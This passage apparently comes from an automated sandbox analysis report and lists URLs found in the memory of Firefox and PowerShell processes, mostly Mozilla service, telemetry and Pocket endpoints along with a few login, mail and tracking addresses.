Source: firefox.exe, 00000010.00000002.3314397385.000001A8B33DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3241215258.000001A8BE3B6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3320702661.000001A8B617A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3266404421.000001A8BE3B6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3236863796.000001A8C06C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285942438.000002B9C2B12000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3285380485.000001F42CD13000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/
Source: firefox.exe, 00000010.00000002.3320702661.000001A8B6122000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3320702661.000001A8B617A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3236863796.000001A8C06C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285942438.000002B9C2BC7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3285380485.000001F42CDC4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B33DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3239864513.000001A8BFFF7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3320702661.000001A8B6122000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3320702661.000001A8B617A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3236863796.000001A8C06C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285942438.000002B9C2BC7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3285380485.000001F42CDC4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_l
Source: firefox.exe, 00000010.00000003.3236863796.000001A8C06C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285942438.000002B9C2B2F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3285380485.000001F42CD30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas
Source: firefox.exe, 00000010.00000002.3320702661.000001A8B6122000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=40249-e88c401e1b1f2242d9e4
Source: firefox.exe, 00000010.00000002.3320702661.000001A8B6122000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtab
Source: firefox.exe, 00000010.00000002.3320702661.000001A8B6122000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtab
Source: firefox.exe, 00000010.00000002.3320702661.000001A8B6122000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtab
Source: firefox.exe, 00000010.00000002.3320702661.000001A8B6122000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtab
Source: firefox.exe, 00000010.00000002.3320702661.000001A8B6122000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtab
Source: firefox.exe, 00000010.00000002.3320702661.000001A8B6122000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab
Source: firefox.exe, 00000010.00000002.3320702661.000001A8B6122000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtab
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B33DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3239864513.000001A8BFFF7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3320702661.000001A8B6122000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3320702661.000001A8B617A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285942438.000002B9C2BC7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3285380485.000001F42CDC4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tab
Source: firefox.exe, 00000010.00000003.3236863796.000001A8C06C7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tabL
Source: firefox.exe, 00000010.00000002.3320702661.000001A8B6122000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtab
Source: firefox.exe, 00000010.00000002.3320702661.000001A8B6122000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B33DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3239864513.000001A8BFFF7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3320702661.000001A8B6122000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3320702661.000001A8B617A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285942438.000002B9C2BC7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3285380485.000001F42CDC4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendations
Source: firefox.exe, 00000010.00000003.3236863796.000001A8C06C7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendationsS
Source: firefox.exe, 00000010.00000003.3236863796.000001A8C06C7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendationsS7
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3303000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3236863796.000001A8C06C7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=basic
Source: powershell.exe, 00000007.00000002.3030468982.0000000004BC6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: firefox.exe, 00000010.00000003.3093590336.000001A8C3238000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3178058975.000001A8C3235000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/google/closure-compiler/issues/3177
Source: firefox.exe, 00000010.00000003.3180111409.000001A8C3217000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query-all.ts
Source: firefox.exe, 00000010.00000003.3180111409.000001A8C3217000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query.ts
Source: firefox.exe, 00000010.00000003.3178058975.000001A8C3235000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/issues/1266
Source: firefox.exe, 00000010.00000003.3178058975.000001A8C3235000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/microsoft/TypeScript/issues/338).
Source: firefox.exe, 00000010.00000003.3048859019.000001A8B6D6B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3048647105.000001A8B6D50000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3048185549.000001A8B6D1C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3047492392.000001A8B6B00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3313124001.000001A8B3120000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000010.00000003.3048393713.000001A8B6D36000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mozilla-services/screenshots
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mozilla-services/screenshotsexperiment-apis/aboutConfigPrefs.jsonexperiment-apis/
Source: firefox.exe, 00000010.00000003.3264652075.000001A8C3148000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/w3c/csswg-drafts/blob/master/css-grid-2/MASONRY-EXPLAINER.md
Source: firefox.exe, 00000010.00000003.3264652075.000001A8C3148000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/w3c/csswg-drafts/issues/4650
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3325000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3236863796.000001A8C06F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/zertosh/loose-envify)
Source: firefox.exe, 00000010.00000002.3320702661.000001A8B617A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google.com
Source: firefox.exe, 00000010.00000002.3297704058.0000010530930000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google.comrward-
Source: firefox.exe, 00000010.00000003.3264652075.000001A8C3148000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gpuweb.github.io/gpuweb/
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://helper1.dap.cloudflareresearch.com/v02
Source: firefox.exe, 00000010.00000002.3302124352.000001A8A5F03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3314397385.000001A8B3303000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3303000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881Updates
Source: firefox.exe, 00000010.00000002.3320702661.000001A8B612E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3216975077.000001A8B3E71000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3320702661.000001A8B61BA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3315084846.000001A8B3E30000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3313124001.000001A8B3120000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000010.00000003.3223260101.000001A8B8239000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3210441384.000001A8B3E71000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ib.absa.co.za/
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://ideas.mozilla.org/
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3325000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://identity.mozilla.com/apps/oldsync
Source: firefox.exe, 00000010.00000003.3262588896.000001A8B83C7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://identity.mozilla.com/apps/oldsyncS
Source: firefox.exe, 00000010.00000003.3238252370.000001A8C3AB7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3234183339.000001A8C3AB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://identity.mozilla.com/apps/relay
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3325000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://identity.mozilla.com/cmd/
Source: firefox.exe, 00000010.00000003.3262588896.000001A8B83C7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://identity.mozilla.com/cmd/H
Source: firefox.exe, 00000010.00000003.3262588896.000001A8B83C7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://identity.mozilla.com/cmd/HCX
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B33DD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://identity.mozilla.com/ids/ecosystem_telemetry
Source: firefox.exe, 00000010.00000003.3262588896.000001A8B83C7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://identity.mozilla.com/ids/ecosystem_telemetryU
Source: firefox.exe, 00000010.00000003.3262588896.000001A8B83C7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://identity.mozilla.com/ids/ecosystem_telemetryUFj
Source: firefox.exe, 00000010.00000003.3264434250.000001A8C317B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://img-getpocket.cdn.mozilla.net/X
Source: firefox.exe, 00000016.00000002.3287438057.0000029D563C8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285942438.000002B9C2BF4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3291725111.000001F42D003000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: firefox.exe, 00000010.00000002.3316913295.000001A8B4977000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org
Source: firefox.exe, 00000010.00000002.3320702661.000001A8B617A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285942438.000002B9C2BEB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3285380485.000001F42CDF4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit
Source: firefox.exe, 00000010.00000003.3273318626.000001A8B8304000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-desktop/events/1/1097c845-c431-43a5-a65c-3382b
Source: firefox.exe, 00000010.00000002.3339830804.000001A8B7BEE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-desktop/messaging-system/1/7755ad51-2370-4623-
Source: firefox.exe, 00000010.00000002.3316913295.000001A8B49B2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3343255794.000001A8B7E07000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-desktop/metrics/1/6d7eb9ba-6a74-433e-8595-8295
Source: firefox.exe, 00000010.00000002.3340745234.000001A8B7C43000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3336939375.000001A8B74A5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit/messaging-system/undesired-events/1/a8e29def-355a-4f78
Source: firefox.exe, 00000010.00000002.3340745234.000001A8B7C43000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3339830804.000001A8B7BEE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit/messaging-system/undesired-events/1/cd4ae739-6293-4846
Source: firefox.exe, 00000010.00000003.3236863796.000001A8C06C7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submits
Source: firefox.exe, 00000010.00000003.3178058975.000001A8C3235000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://infra.spec.whatwg.org/#ascii-whitespace
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://install.mozilla.org
Source: firefox.exe, 00000010.00000002.3330787150.000001A8B6F4D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2019-09/schema
Source: firefox.exe, 00000010.00000003.3262271793.000001A8B84F5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2019-09/schema.
Source: firefox.exe, 00000010.00000003.3262271793.000001A8B84F5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2019-09/schema./
Source: firefox.exe, 00000010.00000003.3262271793.000001A8B84F5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2020-12/schema/
Source: firefox.exe, 00000010.00000003.3262271793.000001A8B84F5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2020-12/schema/=
Source: firefox.exe, 00000010.00000003.3178058975.000001A8C3235000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/libraries/standalone-templates/#rendering-lit-html-templates
Source: firefox.exe, 00000010.00000003.3178058975.000001A8C3235000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/templates/directives/#stylemap
Source: firefox.exe, 00000010.00000003.3178058975.000001A8C3235000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/templates/expressions/#child-expressions)
Source: firefox.exe, 00000010.00000002.3330787150.000001A8B6F66000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%
Source: firefox.exe, 00000010.00000002.3330787150.000001A8B6F29000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3323580066.000001A8B650A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb
Source: firefox.exe, 00000010.00000003.3242315863.000001A8B9F2E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: firefox.exe, 00000010.00000003.3242315863.000001A8B9F2E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.microsoftonline.com
Source: firefox.exe, 00000010.00000002.3327834513.000001A8B6A50000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3315084846.000001A8B3E30000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3313124001.000001A8B3120000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://lookerstudio.google.com/embed/reporting/
Source: firefox.exe, 00000010.00000002.3320702661.000001A8B61BA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3326090847.000001A8B677F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3221122829.000001A8B677F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%s
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%shttps://email.seznam.cz/newMessageScreen?mailto=%s
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%ssetSlowScriptDebugHandler/debugService.activationH
Source: firefox.exe, 00000010.00000003.3065247433.000001A8B69DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3320702661.000001A8B61BA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3165389836.000001A8B69DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3326090847.000001A8B677F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3327649126.000001A8B69DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3221122829.000001A8B677F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.inbox.lv/compose?to=%s
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.inbox.lv/compose?to=%shttp://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 00000010.00000002.3320702661.000001A8B61BA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.inbox.lv/compose?to=%sv
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3221122829.000001A8B677F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%s
Source: firefox.exe, 00000010.00000002.3320702661.000001A8B61BA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%st
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B33DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3302124352.000001A8A5FDD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.3287438057.0000029D56372000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285942438.000002B9C2B86000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3285380485.000001F42CD8F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B33DD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggestError
Source: firefox.exe, 00000016.00000002.3287438057.0000029D56372000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggestabout
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://mitmdetection.services.mozilla.com/
Source: firefox.exe, 00000010.00000002.3313124001.000001A8B3120000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mochitest.youtube.com/
Source: firefox.exe, 00000010.00000002.3302124352.000001A8A5F03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3316913295.000001A8B4995000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3314397385.000001A8B3303000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/?entrypoint=protection_report_monitor&utm_source=about-protections
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/about
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/breach-details/
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/oauth/init?entrypoint=protection_report_monitor&utm_source=about-protect
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/breach-stats?includeResolved=true
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/dashboard
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/preferences
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3303000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mozilla-hub.atlassian.net/browse/SDK-405
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://mozilla-ohttp-fakespot.fastly-edge.com/
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://mozilla.cloudflare-dns.com/dns-query
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3303000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mzl.la/3NS9KJd
